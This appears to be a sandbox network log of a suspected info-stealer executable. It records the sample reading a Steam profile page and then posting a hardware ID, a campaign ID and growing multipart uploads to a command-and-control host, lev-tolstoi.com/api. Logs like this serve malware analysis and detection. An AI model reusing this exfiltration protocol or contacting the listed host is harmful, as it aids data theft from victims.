                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.789465904 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.789472103 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:45.060838938 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:45.060883045 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:45.060991049 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:45.061321020 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:45.061337948 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.317421913 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.317493916 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.342159986 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.342180967 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.342444897 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.350033998 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.350505114 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:46.350563049 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.138997078 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.139292955 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.139364958 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.139446974 CET49703443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.139465094 CET44349703172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.293731928 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.293797016 CET44349704172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.293878078 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.294176102 CET49704443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:47.294203997 CET44349704172.67.157.254192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.240359068 CET53593211.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.245130062 CET6010253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.384407997 CET53601021.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.387470007 CET5091653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.526751041 CET53509161.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.530359030 CET5270353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.671672106 CET53527031.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.676217079 CET5299053192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.816015005 CET53529901.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.819278955 CET6237453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:37.959151983 CET53623741.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.424732924 CET5986553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.564867020 CET53598651.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                                                                                              • lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49700 | 23.55.153.106 | 443 | 8048 | C:\Users\user\Desktop\hx0wBsOjkQ.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:29:39 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-28 08:29:40 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sat, 28 Dec 2024 08:29:39 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=871bf20f18b503033007da11; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-28 08:29:40 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-28 08:29:40 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-28 08:29:40 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49701 | 172.67.157.254 | 443 | 8048 | C:\Users\user\Desktop\hx0wBsOjkQ.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:29:41 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-28 08:29:41 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-28 08:29:42 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Sat, 28 Dec 2024 08:29:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=sh44lokv0k8vrkmqhugcm4g2jp; expires=Wed, 23 Apr 2025 02:16:21 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcwXoNrFVAR8QlCuvnlOWAHsZCJbGyknIs8Ybm4mqrWZRZb9oQi8kVKoN%2FIu1ieuZr4FgIu%2FXB%2FGam3N%2F2QZA%2B2ufxo1DF%2FDS260hr%2FKyAmbkYPVqDI9AjZdPe7Y37AZEO8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f222f487ce7-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2023&rtt_var=764&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1427872&cwnd=199&unsent_bytes=0&cid=5c7b0cf9bd9af7ae&ts=760&x=0"
2024-12-28 08:29:42 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-28 08:29:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49702 | 172.67.157.254 | 443 | 8048 | C:\Users\user\Desktop\hx0wBsOjkQ.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:29:43 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 47
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:29:43 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-28 08:29:44 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:44 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=s8hcj4khn36ekl7mdrtu8sl6du; expires=Wed, 23 Apr 2025 02:16:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nlsVOUXf%2BRyVJ99x3h3L0VzLpDNZGMiJH2gLNHoawkxYfvp0E6rfhTV%2F3HuVK%2FsrFTyYf2iwpn072SB7nFDHhz24OlqffjFLUog92o1okj0lS8gTrG9XSNXjwl3SWYreqGU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f2ecb451a30-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=2017&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=946&delivery_rate=1444829&cwnd=252&unsent_bytes=0&cid=1e5deb868bd06228&ts=752&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49703 | 172.67.157.254 | 443 | 8048 | C:\Users\user\Desktop\hx0wBsOjkQ.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:29:46 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=37NC9T5A4478IQUMN
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 12841
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:29:46 UTC | 12841 | OUT | Data Ascii: --37NC9T5A4478IQUMNContent-Disposition: form-data; name="hwid"5DABC8580B7AE972BEBA0C6A975F1733--37NC9T5A4478IQUMNContent-Disposition: form-data; name="pid"2--37NC9T5A4478IQUMNContent-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-28 08:29:47 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:46 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=nk8ur7hj8ej7ujra71gjiau9jf; expires=Wed, 23 Apr 2025 02:16:25 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2Ffc5M0ZfirQGPr6REOSSt%2FzHD94un6Jrf6Lm4c5MJi0JrPteVQfp8eUCpUBzHmVjPAeOB2YVrOTv7o%2FcNUI8%2F9LTPFV4ElFmg7ADSwXc71JVBXyT7oH0fOmiLU9Z%2FIWuWw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f3dab39de99-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1468&rtt_var=574&sent=14&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13779&delivery_rate=1867007&cwnd=209&unsent_bytes=0&cid=8322fd791422c21c&ts=826&x=0"
2024-12-28 08:29:47 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 08:29:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 49704 | 172.67.157.254 | 443 | 8048 | C:\Users\user\Desktop\hx0wBsOjkQ.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:29:48 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=J41QSBOU
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 15014
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:29:48 UTC | 15014 | OUT | Data Ascii: --J41QSBOUContent-Disposition: form-data; name="hwid"5DABC8580B7AE972BEBA0C6A975F1733--J41QSBOUContent-Disposition: form-data; name="pid"2--J41QSBOUContent-Disposition: form-data; name="lid"PsFKDg--pablo--J41QSBOUContent-Disposit
2024-12-28 08:29:49 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:49 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=vbtah4th10ku68t5ipog9rlff0; expires=Wed, 23 Apr 2025 02:16:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8J3VTGsYfv3UVsEkAs%2FlDr4Q77IfjH2XNp6ZUYL%2FSr2%2B667x2K9NWm6NAqQGWHF5psHl3JKvGnHhEceGKm4HPMWOs7fiQ95TAec1NtKlN9n834uXmbW9Abl1vsUlJdUNsNo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f4b2d0b437a-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2390&min_rtt=2384&rtt_var=906&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15943&delivery_rate=1199671&cwnd=223&unsent_bytes=0&cid=8c4327bc76e33649&ts=1143&x=0"
2024-12-28 08:29:49 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 08:29:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 49705 | 172.67.157.254 | 443 | 8048 | C:\Users\user\Desktop\hx0wBsOjkQ.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:29:51 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=SCT42TTR89
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20388
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:29:51 UTC | 15331 | OUT | Data Ascii: --SCT42TTR89Content-Disposition: form-data; name="hwid"5DABC8580B7AE972BEBA0C6A975F1733--SCT42TTR89Content-Disposition: form-data; name="pid"3--SCT42TTR89Content-Disposition: form-data; name="lid"PsFKDg--pablo--SCT42TTR89Content-
2024-12-28 08:29:51 UTC | 5057 | OUT | Data Ascii: lpQ0/74G6(~`~O\_+d|<x
2024-12-28 08:29:52 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:51 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=b6uoqepbrv69ofbqrpf2c2httc; expires=Wed, 23 Apr 2025 02:16:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lUw6A%2FLPKeU72iMp5W7uOJnTA16EevsFW76il4aUvAhKey%2FZyI0GmShHsdcOdsJBR0wjrt%2FifsYybsEyjHocTgoaS9Ik4cRPbjPezY44adHpl5gdwA3qwJ1V0flwwxeZ%2BbY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f5b7f0cde99-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1542&rtt_var=613&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21341&delivery_rate=1736028&cwnd=209&unsent_bytes=0&cid=3fc04833e3136340&ts=958&x=0"
2024-12-28 08:29:52 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 08:29:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 49707 | 172.67.157.254 | 443 | 8048 | C:\Users\user\Desktop\hx0wBsOjkQ.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:29:54 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=V7XJLHITGPCI
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1210
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:29:54 UTC | 1210 | OUT | Data Ascii:
--V7XJLHITGPCI
Content-Disposition: form-data; name="hwid"

5DABC8580B7AE972BEBA0C6A975F1733
--V7XJLHITGPCI
Content-Disposition: form-data; name="pid"

1
--V7XJLHITGPCI
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--V7XJLHITGPCI
2024-12-28 08:29:55 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:55 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=doqr0hvsirmo4k876lom1uvmo6; expires=Wed, 23 Apr 2025 02:16:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdZJDH83HzW4k0XewwZUqqnj%2BY%2BluItH9VRMV1bcnG%2Ff3OTlZxLyfoaw1MN5yi3KdXx3JMBFtEsq%2BT7tkCJdb7Bjp3drLY%2FXinPP9osOf0fs2aOah41IcKHvyFkqyxXyb%2B4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f902f709e544263-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1650&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2120&delivery_rate=1709601&cwnd=247&unsent_bytes=0&cid=1ebe65d88f06af04&ts=880&x=0"
2024-12-28 08:29:55 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 08:29:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49710 | 172.67.157.254 | 443 | 8048 | C:\Users\user\Desktop\hx0wBsOjkQ.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:29:57 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=L4TJPNUKPYCP0
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 568342
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-28 08:29:57 UTC | 15331 | OUT | Data Ascii:
--L4TJPNUKPYCP0
Content-Disposition: form-data; name="hwid"

5DABC8580B7AE972BEBA0C6A975F1733
--L4TJPNUKPYCP0
Content-Disposition: form-data; name="pid"

1
--L4TJPNUKPYCP0
Content-Disposition: form-data; name="lid"

PsFKDg--pablo
--L4TJPNUKPYC
2024-12-28 08:29:59 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sat, 28 Dec 2024 08:29:59 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=dqgovjuop9hl9vdqdvvi47hji9; expires=Wed, 23 Apr 2025 02:16:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZTgf%2BIu014lR3Txui5HHQRfFvXduwKHtdkcdOlOfxByZ9N6JskoOXcpvggajB%2FEDfnYGHUJ2KpjUCWtOFZsM5eY2MjCfJr4euYzPqHNBA0M5G6x4GK5ND9m6RWJJGLkO09s%3D"}],"group":"cf-nel","max_age":604800}
